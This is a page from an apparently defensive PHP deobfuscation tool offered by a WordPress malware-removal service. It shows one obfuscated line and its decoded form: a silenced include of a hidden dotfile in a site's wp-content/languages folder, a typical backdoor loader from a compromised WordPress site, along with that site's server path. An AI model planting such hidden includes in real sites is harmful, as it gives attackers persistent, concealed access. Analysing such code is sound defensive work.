Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php @include ("/ho\x6de/oxinvesters/visionaryinvestors.co.jp/public_ht\x6dl/news/wp\x2dcontent/languages/.c10a43d1.otc");...



Obfuscated php code

<?php @include ("/ho\x6de/oxinvesters/visionaryinvestors.co.jp/public_ht\x6dl/news/wp\x2dcontent/languages/.c10a43d1.otc");

Decoded(de-Obfuscated) php code

<?php

@(include "/home/oxinvesters/visionaryinvestors.co.jp/public_html/news/wp-content/languages/.c10a43d1.otc");


Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.